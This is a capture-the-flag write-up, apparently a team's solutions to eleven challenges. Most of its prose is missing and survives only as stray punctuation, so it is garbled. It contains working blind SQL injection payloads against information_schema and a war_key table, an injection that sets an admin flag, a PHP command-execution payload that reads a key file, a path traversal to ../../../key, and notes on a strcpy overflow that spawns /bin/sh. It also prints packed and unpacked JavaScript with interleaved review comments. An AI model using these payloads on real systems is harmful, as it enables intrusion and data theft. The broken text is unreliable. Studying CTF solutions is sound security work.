
hkpco, hellsonic, lokihardt, gogil


S1_Hello_kiki: 100
hello_kiki.pcap .
RTP , -> VoIP Calls
, .


S2_qu3st2: 150
IDA .

base64 decode .


S3_Find a key: 200


IDA .


S4_Find a key and encode MD5: 300


jpg .jpg .jpg 3 jpg .

jpg FFD9 FFD9 2Byte .

2Byte .jpg = 90, .jpg = 180, .jpg = 270 .

.jpg (x.y.z) 5x5x5 ,


.jpg .jpg .
E 90, 180, 270 Y
. .


KEY IS A TCAN

md5(TCAN)

Key) 2ceb9b1a93b1b4ea9a57a117ddc3acfa


S5_Find a key : 400

modify_ok.php
Blind SQL Injection .
sex=if((select substr(LPAD(bin(ascii(substr((SELECT table_name FROM information_schema.tables
WHERE table_type='base table' limit 1,1),$j,1))),8,0),$i,1)),1,2)

war_key , war_key .
war_key .
if((select substr(LPAD(bin(ascii(substr((SELECT war_key FROM war_key limit 0,1),$j,1))),8,0),$i,1)),1,2)

Key) President_of_HUST_is_Bother_Me


S6_Find a key: 400


IDA xor 2
.

c NULL 21 xor .


S7_W T F: 350
a~z, A ~ Z input 'i' .
stringX gqSQUMGsmIeuiE .

Constraint Programming solver a = 1, b = 6, c = 2


abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
x .
stringX WOWOCSWWSOCCOC .


S8_Find a key: 400


find_account_question insert SQL injection

0,1,2,3...,"Y",...)#

(is_admin "Y" ) , ,

<?=`cat ThisisKeyFile.php`?> .


S9_Find a key: 600


. .

<?php
/* --- */
/* Challenge source as published: the server address and the secret key are redacted ("[****]"). */
$ip = "[****]";
$key = "[****]";
/*It's my door trick*/
/* Request parameter "a"; the array key is written as a bare word rather than a quoted string. */
$a=$_GET[a];
/* $b keeps the value exactly as received (string or array) before $a is flattened below. */
$b=$a;
/* Array input only: join the elements into one string; $x is whatever follows the first strlen($key) characters. */
if(is_array($a)){
$a= implode($a);
$x= substr($a,strlen($key));
}
/* Gate 1: the (flattened) input must begin with $key.
   NOTE(review): == is PHP's loose comparison; a strict, constant-time check such as hash_equals() is the usual choice when comparing a secret. */
if($key==substr($a,0,strlen($key))){
/* Gate 2: the element of $b at index count($b) must be numeric.
   NOTE(review): in a sequentially indexed array that index is one past the last element, so whether it exists depends on the keys the caller supplied. */
if(is_numeric(($b[count($b)]))){
/* $y = $ip followed by a redacted suffix; $xx = $key followed by $x ($x is only set in the array branch above). */
$y = $ip."[****]";
$xx = $key.$x;
/* The function name is redacted on the page ("[R**]"); it is called with ($xx, $y). */
$r_key = [R**]($xx, $y);
}
}
/* Runs whether or not the gates passed, so $r_key may be unset here. */
$r_key=(base64_encode($r_key));
/* Every '+' in the base64 text is rewritten to '||'. */
$r_key=str_replace('+','||',$r_key);
/* ---- */
/* NOTE(review): request parameter "glob_dir" is appended unfiltered to /var/www/html/ and used as a glob() pattern,
   and the matches are printed. No check for ".." or wildcards is visible, so file names are disclosed to any caller;
   a fixed allowlist or a realpath() prefix check would be the usual mitigation. */
if($_GET[glob_dir]){
print_r(glob("/var/www/html/".$_GET[glob_dir]));
}
?>

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharC
ode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c]);return
p}('T(K(p,a,N,k,e,r){e=K(c){L(c<a?\'\':e(U(c/a)))+((c=c%a)>V?O.W(c+X):c.Y(Z))};M(!\'\'.P(/^/,O)){Q(c-)r[e(c)]=k[c]||e(c);k=[K(e){L

r[e]}];e=K(){L\'\\\\w+\'};c=1};Q(c--)M(k[c])p=p.P(R

10(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);L
3();2(8.3){c=1

p}(\'0="";0+="i";j="k";l=4;m

3();2(c.9){c.9(\\\'o/p\\\')}}q

5("s.6")}f(e){}}}2(!c){t(\\\'u

:(

2(8.5){d{c=1
y

z\\\');g

7(a,b){n

c=1

5("r.6")}f(e){d{c=1
A}c.B("C",a,h);c.D(E);g

h}0+="F";0+="G";0+="H";7("a.I?a="+J);\',S,S,\'11|R|M|12||13|14|15|16|17||||18||19|L|1a|1b|N|1c|1d|K|1
e|1f|1g|1h|1i|1j|1k|1l|1m|1n|1o|1p|1q|1r|1s|1t|1u|1v|1w|1x|1y|1z|1A\'.1B(\'|\'),0,{}))',62,100,'||||||||||||||||||||
||||||||||||||||||||||||||function|return|if|Cstar|String|replace|while|new|46|eval|parseInt|35|fromCharCode|29|t
oString|36|RegExp|key|XMLHttpRequest|ActiveXObject|XMLHTTP|makeRequest|window|overrideMim
eType|try|catch|true|0xde|alone|rc|var|text|xml|else|Msxml2|Microsoft|alert|Giving|up|Cannot|create|a
n|instance|false|open|GET|send|null|ad|be|ef|php|sc|split'.split('|'),0,{}))

eval -> alert

// Output of a p,a,c,k,e,r-style packer: the outer function takes the packed text (p), a radix (a = 46),
// a word count (46) and a '|'-separated word list (k), substitutes each base-46 token in p with its
// word, and returns the rebuilt script, which eval() then executes.
// For analysis, pass the rebuilt text to a non-executing sink instead of eval (the page uses alert),
// so the payload is displayed rather than run.
// NOTE(review): the third parameter is named Cstar while the body counts down with c; the page's
// following note appears to say it must be renamed back to c before this will run.
// Line breaks inside this listing come from the page layout; some fall mid-token (e.g. inside
// String.fromCharCode), so the text is not runnable exactly as shown.
eval(function(p,a,Cstar,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCh
arCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0="";0+="i";j="k";l=4;m 7(a,b){n c=1 3();2(8.3){c=1
3();2(c.9){c.9(\'o/p\')}}q 2(8.5){d{c=1 5("r.6")}f(e){d{c=1 5("s.6")}f(e){}}}2(!c){t(\'u v :( w x y 6 z\');g
A}c.B("C",a,h);c.D(E);g
h}0+="F";0+="G";0+="H";7("a.I?a="+J);',46,46,'key|new|if|XMLHttpRequest||ActiveXObject|XMLHTTP|
makeRequest|window|overrideMimeType||||try||catch|return|true|0xde|Cstar|alone|rc|function|var|text|
xml|else|Msxml2|Microsoft|alert|Giving|up|Cannot|create|an|instance|false|open|GET|send|null|ad|be|e
f|php|sc'.split('|'),0,{}))

, function Cstar c .

// Unpacked payload, opening statements. These assign to undeclared names, so they only work in
// sloppy-mode script (they create globals); in strict mode or an ES module they would throw.
key = "";
// First fragment of the key; the statements after makeRequest() append "ad", "be" and "ef".
key += "0xde";
// NOTE(review): Cstar and rc are set here but never read in this listing. The write-up's later text
// names RC4, so rc = 4 may be a hint — unconfirmed.
Cstar = "alone";
rc = 4;
/**
 * Fires an asynchronous GET request at the given URL and ignores the response.
 *
 * @param a URL handed to open().
 * @param b Unused in this body.
 * @returns true once send() has been called; false if no request object exists.
 */
function makeRequest(a, b) {
// Constructed unconditionally, before the feature test below: where the constructor is missing
// this line throws, so the ActiveX fallback cannot be reached in that case.
var c = new XMLHttpRequest();
if (window.XMLHttpRequest) {
c = new XMLHttpRequest();
if (c.overrideMimeType) {
// Ask the browser to treat the response as XML regardless of the served type.
c.overrideMimeType('text/xml')
}
} else if (window.ActiveXObject) {
// Legacy fallback: try the two ActiveX program IDs in turn.
try {
c = new ActiveXObject("Msxml2.XMLHTTP")
} catch (e) {
try {
c = new ActiveXObject("Microsoft.XMLHTTP")
// Both attempts failed: the error is swallowed and c keeps its earlier value.
} catch (e) {}
}
}
// NOTE(review): c already holds an object from the first statement, so this guard appears unreachable.
if (!c) {
alert('Giving up :( Cannot create an XMLHTTP instance');
return false
}
// Third argument true = asynchronous; no response handler is attached, so the reply is discarded.
c.open("GET", a, true);
c.send(null);
return true
}
// Remaining key fragments: with the earlier "0xde" the global now reads "0xdeadbeef".
// The value is assembled entirely in client-side script, so packing only hides it from a casual
// reader — anyone who unpacks the script recovers it.
key += "ad";
key += "be";
key += "ef";
// NOTE(review): sc is not defined anywhere in this listing, and key itself is never passed to the
// request; the query string is built by plain concatenation with no encoding.
makeRequest("a.php?a=" + sc);


0xdeadbeef , PHP [R**] RC4


.
a 0xdeadbeef(3735928559) RC4
.
makeRequest("a.php?b=7csrkIlsU4EJNCl/TmEk||ElHZ6tdy2eWOp8NvQ==&x=");
x 0xdeadbeef 3735928559 youtube .

7csrkIlsU4EJNCl/TmEk||ElHZ6tdy2eWOp8NvQ== 0xdeadbeef ARCFOUR Decrypt


192.168.0.12_get_./download , 192.168.0.12_get_../../../key
.


S10_Find a key: 500


strcpy bof
.

./bin -h a -d xxxxxx... (h )

/home/k1r.. PC
.
printf pc .
, execl printf
null , execl /bin/sh] \n .
/bin /tmp , tmp sh] \n .


S11_Find a key: 500

jsp apk apk otp


.
( - 1)

Boss.smali
